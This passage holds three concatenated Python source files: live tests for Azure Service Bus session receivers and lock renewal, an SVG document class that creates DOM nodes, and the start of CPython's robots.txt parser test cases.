session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10) as receiver: renewer.register(receiver, receiver.session, max_lock_renewal_duration=10, on_lock_renew_failure=lock_lost_callback) print("Registered lock renew thread", receiver.session._locked_until_utc, utc_now()) with pytest.raises(SessionLockLostError): for message in receiver: if not messages: print("Starting first sleep") time.sleep(10) print("First sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not receiver.session._lock_expired with pytest.raises(TypeError): message._lock_expired assert message.locked_until_utc is None with pytest.raises(TypeError): receiver.renew_message_lock(message) assert message.lock_token is not None receiver.complete_message(message) messages.append(message) elif len(messages) == 1: print("Starting second sleep") time.sleep(10) # ensure renewer expires print("Second sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not results sleep_until_expired(receiver.session) # and then ensure it didn't slip a renew under the wire. assert receiver.session._lock_expired assert isinstance(receiver.session.auto_renew_error, AutoLockRenewTimeout) try: receiver.complete_message(message) raise AssertionError("Didn't raise SessionLockLostError") except SessionLockLostError as e: assert isinstance(e.inner_exception, AutoLockRenewTimeout) messages.append(message) # While we're testing autolockrenew and sessions, let's make sure we don't call the lock-lost callback when a session exits. renewer._renew_period = 1 session = None with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10) as receiver: session = receiver.session renewer.register(receiver, session, max_lock_renewal_duration=5, on_lock_renew_failure=lock_lost_callback) sleep_until_expired(receiver.session) assert not results renewer.close() assert len(messages) == 2 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_conn_str_receive_handler_with_auto_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=True) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("{}".format(i), session_id=session_id) sender.send_messages(message) results = [] def lock_lost_callback(renewable, error): results.append(renewable) renewer = AutoLockRenewer(max_lock_renewal_duration=10, on_lock_renew_failure = lock_lost_callback) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10, auto_lock_renewer=renewer) as receiver: print("Registered lock renew thread", receiver.session._locked_until_utc, utc_now()) with pytest.raises(SessionLockLostError): for message in receiver: if not messages: print("Starting first sleep") time.sleep(10) print("First sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not receiver.session._lock_expired with pytest.raises(TypeError): message._lock_expired assert message.locked_until_utc is None with pytest.raises(TypeError): receiver.renew_message_lock(message) assert message.lock_token is not None receiver.complete_message(message) messages.append(message) elif len(messages) == 1: print("Starting second sleep") time.sleep(10) # ensure renewer expires print("Second sleep {}".format(receiver.session._locked_until_utc - utc_now())) assert not results sleep_until_expired(receiver.session) # and then ensure it didn't slip a renew under the wire. assert receiver.session._lock_expired assert isinstance(receiver.session.auto_renew_error, AutoLockRenewTimeout) try: receiver.complete_message(message) raise AssertionError("Didn't raise SessionLockLostError") except SessionLockLostError as e: assert isinstance(e.inner_exception, AutoLockRenewTimeout) messages.append(message) # While we're testing autolockrenew and sessions, let's make sure we don't call the lock-lost callback when a session exits. renewer._renew_period = 1 session = None with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK, prefetch_count=10, auto_lock_renewer=renewer) as receiver: session = receiver.session sleep_until_expired(receiver.session) assert not results renewer.close() assert len(messages) == 2 # test voluntary halt of auto lock renewer when session is closed session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: messages = [ServiceBusMessage("{}".format(i), session_id=session_id) for i in range(10)] sender.send_messages(messages) renewer = AutoLockRenewer(max_lock_renewal_duration=100) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, prefetch_count=10, auto_lock_renewer=renewer) with receiver: received_msgs = receiver.receive_messages(max_wait_time=5) for msg in received_msgs: receiver.complete_message(msg) receiver.close() assert not renewer._renewable(receiver._session) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @CachedServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_receiver_partially_invalid_autolockrenew_mode(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: sender.send_messages(ServiceBusMessage("test_message", session_id=session_id)) failures = 0 def should_not_run(*args, **kwargs): failures += 1 auto_lock_renewer = AutoLockRenewer(on_lock_renew_failure=should_not_run) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, auto_lock_renewer=auto_lock_renewer) as receiver: assert receiver.receive_messages() assert not failures @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_message_connection_closed(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("test") message.session_id = session_id sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=10) assert len(messages) == 1 with pytest.raises(ValueError): receiver.complete_message(messages[0]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_message_expiry(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("Testing expired messages") message.session_id = session_id sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=10) assert len(messages) == 1 print_message(_logger, messages[0]) time.sleep(10) with pytest.raises(TypeError): messages[0]._lock_expired with pytest.raises(TypeError): receiver.renew_message_lock(messages[0]) #TODO: Bug: Why was this 30s sleep before? compare with T1. assert receiver.session._lock_expired with pytest.raises(SessionLockLostError): receiver.complete_message(messages[0]) with pytest.raises(SessionLockLostError): receiver.session.renew_lock() with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=30) assert len(messages) == 1 print_message(_logger, messages[0]) assert messages[0].delivery_count receiver.complete_message(messages[0]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_schedule_message(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: content = str(uuid.uuid4()) message_id = uuid.uuid4() message = ServiceBusMessage(content, session_id=session_id) message.message_id = message_id message.scheduled_enqueue_time_utc = enqueue_time sender.send_messages(message) messages = [] count = 0 while not messages and count < 12: messages = receiver.receive_messages(max_wait_time=10) receiver.session.renew_lock(timeout=None) count += 1 data = str(messages[0]) assert data == content assert messages[0].message_id == message_id assert messages[0].scheduled_enqueue_time_utc == enqueue_time assert messages[0].scheduled_enqueue_time_utc == messages[0].enqueued_time_utc.replace(microsecond=0) assert len(messages) == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_schedule_multiple_messages(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=20) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: content = str(uuid.uuid4()) message_id_a = uuid.uuid4() message_a = ServiceBusMessage(content, session_id=session_id) message_a.message_id = message_id_a message_id_b = uuid.uuid4() message_b = ServiceBusMessage(content, session_id=session_id) message_b.message_id = message_id_b tokens = sender.schedule_messages([message_a, message_b], enqueue_time) assert len(tokens) == 2 messages = [] count = 0 while len(messages) < 2 and count < 12: receiver.session.renew_lock(timeout=None) messages.extend(receiver.receive_messages(max_wait_time=15)) time.sleep(5) count += 1 data = str(messages[0]) assert data == content assert messages[0].message_id in (message_id_a, message_id_b) assert messages[0].scheduled_enqueue_time_utc == enqueue_time assert messages[0].scheduled_enqueue_time_utc == messages[0].enqueued_time_utc.replace(microsecond=0) assert len(messages) == 2 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_cancel_scheduled_messages(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_sender(servicebus_queue.name) as sender: message_a = ServiceBusMessage("Test scheduled message", session_id=session_id) message_b = ServiceBusMessage("Test scheduled message", session_id=session_id) tokens = sender.schedule_messages([message_a, message_b], enqueue_time) assert len(tokens) == 2 sender.cancel_scheduled_messages(tokens) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = [] count = 0 while not messages and count < 13: messages = receiver.receive_messages(max_wait_time=20) receiver.session.renew_lock() count += 1 assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_get_set_state_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Handler message no. {}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as session: assert session.session.get_state(timeout=5) == None session.session.set_state("first_state", timeout=5) count = 0 for m in session: assert m.session_id == session_id count += 1 state = session.session.get_state() assert state == b'first_state' assert count == 3 @pytest.mark.skip(reason="Needs list sessions") @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_list_sessions_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [] start_time = utc_now() for i in range(5): sessions.append(str(uuid.uuid4())) for session_id in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) for session_id in sessions: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: receiver.set_state("SESSION {}".format(session_id)) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK) as receiver: current_sessions = receiver.list_sessions(updated_since=start_time) assert len(current_sessions) == 5 assert current_sessions == sessions @pytest.mark.skip("Requires list sessions") @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_list_sessions_with_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [] start_time = utc_now() for i in range(5): sessions.append(str(uuid.uuid4())) for session in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session) sender.send_messages(message) for session in sessions: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session) as receiver: receiver.set_state("SESSION {}".format(session)) current_sessions = receiver.list_sessions(updated_since=start_time) assert len(current_sessions) == 5 assert current_sessions == sessions @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_session_pool(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): messages = [] errors = [] concurrent_receivers = 5 def message_processing(sb_client): while True: try: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=10) as receiver: for message in receiver: print("ServiceBusReceivedMessage: {}".format(message)) messages.append(message) receiver.complete_message(message) except OperationTimeoutError: return except Exception as e: errors.append(e) raise with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [str(uuid.uuid4()) for i in range(concurrent_receivers)] for session_id in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(20): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) futures = [] with concurrent.futures.ThreadPoolExecutor(max_workers=concurrent_receivers) as thread_pool: for _ in range(concurrent_receivers): futures.append(thread_pool.submit(message_processing, sb_client)) concurrent.futures.wait(futures) assert not errors assert len(messages) == 100 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_peeklock_abandon(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Handler message no. {}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=0, max_wait_time=5) as receiver: message = receiver.next() assert message.sequence_number == 1 receiver.abandon_message(message) for next_message in receiver: # we can't be sure there won't be a service delay, so we may not get the message back _immediately_, even if in most cases it shows right back up. if not next_message: raise Exception("Did not successfully re-receive abandoned message, sequence_number 1 was not observed.") if next_message.sequence_number == 1: return @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusTopicPreparer(name_prefix='servicebustest') @ServiceBusSubscriptionPreparer(name_prefix='servicebustest', requires_session=True) def test_session_basic_topic_subscription_send_and_receive(self, servicebus_namespace_connection_string, servicebus_topic, servicebus_subscription, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False ) as sb_client: with sb_client.get_topic_sender(topic_name=servicebus_topic.name) as sender: message = ServiceBusMessage(b"Sample topic message", session_id='test_session') sender.send_messages(message) with sb_client.get_subscription_receiver( topic_name=servicebus_topic.name, subscription_name=servicebus_subscription.name, session_id='test_session', max_wait_time=5 ) as receiver: count = 0 for message in receiver: count += 1 receiver.complete_message(message) assert count == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @CachedServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_non_session_send_to_session_queue_should_fail(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("This should be an invalid non session message") with pytest.raises(ServiceBusError): sender.send_messages(message)
from xml.dom.minidom import DOMImplementation from xml.dom.minidom import Document from RGT.XML.SVG.svgNode import SvgNode from RGT.XML.SVG.gNode import GNode from RGT.XML.SVG.defsNode import DefsNode from RGT.XML.SVG.descNode import DescNode from RGT.XML.SVG.titleNode import TitleNode from RGT.XML.SVG.symbolNode import SymbolNode from RGT.XML.SVG.imageNode import ImageNode from RGT.XML.SVG.useNode import UseNode from RGT.XML.SVG.switchNode import SwitchNode from RGT.XML.SVG.styleNode import StyleNode from RGT.XML.SVG.pathNode import PathNode from RGT.XML.SVG.rectNode import RectNode from RGT.XML.SVG.circleNode import CircleNode from RGT.XML.SVG.ellipseNode import EllipseNode from RGT.XML.SVG.lineNode import LineNode from RGT.XML.SVG.polylineNode import PolylineNode from RGT.XML.SVG.polygonNode import PolygonNode from RGT.XML.SVG.textNode import TextNode from RGT.XML.SVG.tspanNode import TspanNode from RGT.XML.SVG.trefNode import TrefNode from RGT.XML.SVG.textPathNode import TextPathNode from RGT.XML.SVG.altGlyphNode import AltGlyphNode from RGT.XML.SVG.altGlyDefNode import AltGlyphDefNode from RGT.XML.SVG.altGlyphItemNode import AltGlyphItemNode from RGT.XML.SVG.glyphRefNode import GlyphRefNode from RGT.XML.SVG.markerNode import MarkerNode from RGT.XML.SVG.colorProfileNode import ColorProfileNode from RGT.XML.SVG.clipPathNode import ClipPathNode from RGT.XML.SVG.maskNode import MaskNode from RGT.XML.SVG.filterNode import FilterNode #filters from RGT.XML.SVG.Filters.feDistantLightNode import FeDistantLightNode from RGT.XML.SVG.Filters.fePointLightNode import FePointLightNode from RGT.XML.SVG.Filters.feSpotLightNode import FeSpotLightNode from RGT.XML.SVG.Filters.feBlendNode import FeBlendNode from RGT.XML.SVG.Filters.feColorMatrixNode import FeColorMatrixNode from RGT.XML.SVG.Filters.feComponentTransferNode import FeComponentTransferNode from RGT.XML.SVG.Filters.feFuncRNode import FeFuncRNode from RGT.XML.SVG.Filters.feFuncGNode import FeFuncGNode from RGT.XML.SVG.Filters.feFuncANode import FeFuncANode from RGT.XML.SVG.Filters.feFuncBNode import FeFuncBNode from RGT.XML.SVG.Filters.feCompositeNode import FeCompositeNode from RGT.XML.SVG.Filters.feConvolveMatrixNode import FeConvolveMatrixNode from RGT.XML.SVG.Filters.feDiffuseLightingNode import FeDiffuseLightingNode from RGT.XML.SVG.Filters.feDisplacementMapNode import FeDisplacementMapNode from RGT.XML.SVG.Filters.feFloodNode import FeFloodNode from RGT.XML.SVG.Filters.feGaussianBlurNode import FeGaussianBlurNode from RGT.XML.SVG.Filters.feImageNode import FeImageNode from RGT.XML.SVG.Filters.feMergeNode import FeMergeNode from RGT.XML.SVG.Filters.feMergeNodeNode import FeMergeNodeNode from RGT.XML.SVG.Filters.feMorphologyNode import FeMorphologyNode from RGT.XML.SVG.Filters.feOffsetNode import FeOffsetNode from RGT.XML.SVG.Filters.feSpecularLightingNode import FeSpecularLightingNode from RGT.XML.SVG.Filters.feTileNode import FeTileNode from RGT.XML.SVG.Filters.feTurbulenceNode import FeTurbulenceNode #finish filters from RGT.XML.SVG.cursorNode import CursorNode from RGT.XML.SVG.aNode import ANode from RGT.XML.SVG.viewNode import ViewNode from RGT.XML.SVG.scriptNode import ScriptNode #animate from RGT.XML.SVG.Animation.animateNode import AnimateNode from RGT.XML.SVG.Animation.setNode import SetNode from RGT.XML.SVG.Animation.animateMotionNode import AnimateMotionNode from RGT.XML.SVG.Animation.mpathNode import MpathNode from RGT.XML.SVG.Animation.animateColorNode import AnimateColorNode from RGT.XML.SVG.Animation.animateTransformNode import AnimateTransformNode #end animate #font from RGT.XML.SVG.fontNode import FontNode from RGT.XML.SVG.glyphNode import GlyphNode from RGT.XML.SVG.missingGlyphNode import MissingGlyph from RGT.XML.SVG.hkernNode import HkernNode from RGT.XML.SVG.vkernNode import VkernNode from RGT.XML.SVG.fontFaceNode import FontFaceNode from RGT.XML.SVG.fontFaceSrcNode import FontFaceSrcNode from RGT.XML.SVG.fontFaceUriNode import FontFaceUriNode from RGT.XML.SVG.fontFaceFormatNode import FontFaceFormatNode from RGT.XML.SVG.fontFaceNameNode import FontFaceNameNode #end font from RGT.XML.SVG.metadataNode import MetadataNode from RGT.XML.SVG.foreignObjectNode import ForeignObjectNode #gradient from RGT.XML.SVG.linearGradientNode import LinearGradientNode from RGT.XML.SVG.radialGradientNode import RadialGradientNode #end gradient from RGT.XML.SVG.patternNode import PatternNode from RGT.XML.SVG.stopNode import StopNode #class copied from minidom class SvgDOMImplementation(DOMImplementation): def createSvgDocument(self): #namespaceURI= None doctype = None #qualifiedName= 'svg' doc = SvgDocument() element = doc.createSvgNode() doc.appendChild(element) doc.doctype = doctype doc.implementation = self return doc #class copied from minidom class SvgDocument(Document): implementation = SvgDOMImplementation def __init__(self): Document.__init__(self) def createSvgNode(self): return SvgNode(self) def createGNode(self): return GNode(self) def createDefsNode(self): return DefsNode(self) def createDescNode(self): return DescNode(self) def createTitleNode(self): return TitleNode(self) def createSymbolNode(self): return SymbolNode(self) def createUseNode(self): return UseNode(self) def createImageNode(self): return ImageNode(self) def createSwitchNode(self): return SwitchNode(self) def createStyleNode(self): return StyleNode(self) def createPathNode(self): return PathNode(self) def createRectNode(self, x=None, y=None, height=None, width=None): return RectNode(self, x, y, height, width) def createCircleNode(self, cx=None, cy=None, r=None): return CircleNode(self, cx, cy, r) def createEllipseNode(self, rx=None, ry=None): return EllipseNode(self, rx, ry) def createLineNode(self, x1=None, y1=None, x2=None, y2=None): lineNode = LineNode(self, x1, y1, x2, y2) return lineNode def createPolylineNode(self, points=None): return PolylineNode(self, points) def createPolygonNode(self, points=None): return PolygonNode(self, points) def createSvgTextNode(self, x=None, y=None, text=None): return TextNode(self, x, y, text) def createTspanNode(self, x=None, y=None): return TspanNode(self, x, y) def createTrefNode(self): return TrefNode(self) def createTextPathNode(self): return TextPathNode(self) def createAltGlyphNode(self): return AltGlyphNode(self) def createAltGlyphDefNode(self): return AltGlyphDefNode(self) def createAltGlyphItemNode(self): return AltGlyphItemNode(self) def createGlyphRefNode(self): return GlyphRefNode(self) def createMarkerNode(self): return MarkerNode(self) def createColorProfileNode(self): return ColorProfileNode(self) def createClipPathNode(self): return ClipPathNode(self) def createMaskNode(self): return MaskNode(self) def createFilterNode(self): return FilterNode(self) #filters def createFeDistantLightNode(self, azimuth=None, elevation=None): return FeDistantLightNode(self, azimuth, elevation) def createFePointLightNode(self, x=None, y=None, z=None): return FePointLightNode(self, x, y, z) def createFeSpotLightNode(self, x=None, y=None, z=None, specularExponent=None, limitingConeAngle=None): return FeSpotLightNode(self, x, y, z, specularExponent, limitingConeAngle) def createFeBlendNode(self): return FeBlendNode(self) def createFeColorMatrixNode(self): return FeColorMatrixNode(self) def createFeComponentTransferNode(self): return FeComponentTransferNode(self) def createFeFuncRNode(self): return FeFuncRNode(self) def createFeFuncGNode(self): return FeFuncGNode(self) def createFeFuncA(self): return FeFuncANode(self) def createFeFuncB(self): return FeFuncBNode(self) def createFeCompositeNode(self): return FeCompositeNode(self) def createrFeConvolveMatrixNode(self): return FeConvolveMatrixNode(self) def createFeDiffuseLightingNode(self): return FeDiffuseLightingNode(self) def createFeDisplacementMapNode(self): return FeDisplacementMapNode(self) def createFeFloodNode(self): return FeFloodNode(self) def createFeGaussianBlurNode(self): return FeGaussianBlurNode(self) def createFeImageNode(self): return FeImageNode(self) def createFeMergeNode(self): return FeMergeNode(self) def createFeMergeNodeNode(self): return FeMergeNodeNode(self) def createFeMorphologyNode(self): return FeMorphologyNode(self) def createFeOffsetNode(self): return FeOffsetNode(self) def createFeSpecularLightingNode(self): return FeSpecularLightingNode(self) def createFeTileNode(self): return FeTileNode(self) def createFeTurbulenceNode(self): return FeTurbulenceNode(self) #end filters def createCursorNode(self, x=None, y=None): return CursorNode(self, x, y) def createANode(self): return ANode(self) def createViewNode(self): return ViewNode(self) def createScriptNode(self): return ScriptNode(self) #animate def createAnimateNode(self): return AnimateNode(self) def createSetNode(self): return SetNode(self) def createAnimateMotionNode(self): return AnimateMotionNode(self) def createMPathNode(self): return MpathNode(self) def createAnimateColorNode(self): return AnimateColorNode(self) def createAnimateTransformNode(self): return AnimateTransformNode(self) #end animate #font def createFontNode(self): return FontNode(self) def createGlypthNode(self): return GlyphNode(self) def createMissingGlypthNode(self): return MissingGlyph(self) def createHkernNode(self): return HkernNode(self) def createVkernNode(self): return VkernNode(self) def createFontFaceNode(self): return FontFaceNode(self) def createFontFaceSrcNode(self): return FontFaceSrcNode(self) def createFontFaceUriNode(self): return FontFaceUriNode(self) def createFontFaceFormatNode(self): return FontFaceFormatNode(self) def createFontFaceNameNode(self): return FontFaceNameNode(self) #end font def createMetadataNode(self): return MetadataNode(self) def createForeignObjectNode(self): return ForeignObjectNode(self) #gradient def createLinearGradientNode(self, x1=None, y1=None, x2=None, y2=None): return LinearGradientNode(self, x1, y1, x2, y2) def createRadialGradientNode(self): return RadialGradientNode(self) #end gradient def createGlyphNode(self): return GlyphNode(self) def createPatternNode(self): return PatternNode(self) def createStopNode(self, offset=None, stopColor=None, stopOpacity=None, style=None): return StopNode(self, offset, stopColor, stopOpacity, style) #copy from minidom, removed the part that writes the <?xml version="1.0" ?> and the encoding def writexml(self, writer, indent="", addindent="", newl="", encoding=None): for node in self.childNodes: node.writexml(writer, indent, addindent, newl)
import io import unittest import urllib.robotparser from urllib.error import URLError, HTTPError from urllib.request import urlopen from test import support class RobotTestCase(unittest.TestCase): def __init__(self, index, parser, url, good, agent): unittest.TestCase.__init__(self) if good: self.str = "RobotTest(%d, good, %s)" % (index, url) else: self.str = "RobotTest(%d, bad, %s)" % (index, url) self.parser = parser self.url = url self.good = good self.agent = agent def runTest(self): if isinstance(self.url, tuple): agent, url = self.url else: url = self.url agent = self.agent if self.good: self.assertTrue(self.parser.can_fetch(agent, url)) else: self.assertFalse(self.parser.can_fetch(agent, url)) def __str__(self): return self.str tests = unittest.TestSuite() def RobotTest(index, robots_txt, good_urls, bad_urls, agent="test_robotparser"): lines = io.StringIO(robots_txt).readlines() parser = urllib.robotparser.RobotFileParser() parser.parse(lines) for url in good_urls: tests.addTest(RobotTestCase(index, parser, url, 1, agent)) for url in bad_urls: tests.addTest(RobotTestCase(index, parser, url, 0, agent)) # Examples from http://www.robotstxt.org/wc/norobots.html (fetched 2002) # 1. doc = """ User-agent: * Disallow: /cyberworld/map/ # This is an infinite virtual URL space Disallow: /tmp/ # these will soon disappear Disallow: /foo.html """ good = ['/','/test.html'] bad = ['/cyberworld/map/index.html','/tmp/xxx','/foo.html'] RobotTest(1, doc, good, bad) # 2. doc = """ # robots.txt for http://www.example.com/ User-agent: * Disallow: /cyberworld/map/ # This is an infinite virtual URL space # Cybermapper knows where to go. User-agent: cybermapper Disallow: """ good = ['/','/test.html',('cybermapper','/cyberworld/map/index.html')] bad = ['/cyberworld/map/index.html'] RobotTest(2, doc, good, bad) # 3. doc = """ # go away User-agent: * Disallow: / """ good = [] bad = ['/cyberworld/map/index.html','/','/tmp/'] RobotTest(3, doc, good, bad) # Examples from http://www.robotstxt.org/wc/norobots-rfc.html (fetched 2002) # 4. doc = """ User-agent: figtree Disallow: /tmp Disallow: /a%3cd.html Disallow: /a%2fb.html Disallow: /%7ejoe/index.html """ good = [] # XFAIL '/a/b.html' bad = ['/tmp','/tmp.html','/tmp/a.html', '/a%3cd.html','/a%3Cd.html','/a%2fb.html', '/~joe/index.html' ] RobotTest(4, doc, good, bad, 'figtree') RobotTest(5, doc, good, bad, 'FigTree Robot libwww-perl/5.04') # 6. doc = """ User-agent: * Disallow: /tmp/ Disallow: /a%3Cd.html Disallow: /a/b.html Disallow: /%7ejoe/index.html """ good = ['/tmp',] # XFAIL: '/a%2fb.html' bad = ['/tmp/','/tmp/a.html', '/a%3cd.html','/a%3Cd.html',"/a/b.html", '/%7Ejoe/index.html'] RobotTest(6, doc, good, bad) # From bug report #523041 # 7. doc = """ User-Agent: * Disallow: /. """ good = ['/foo.html'] bad = [] # Bug report says "/" should be denied, but that is not in the RFC RobotTest(7, doc, good, bad) # From Google: 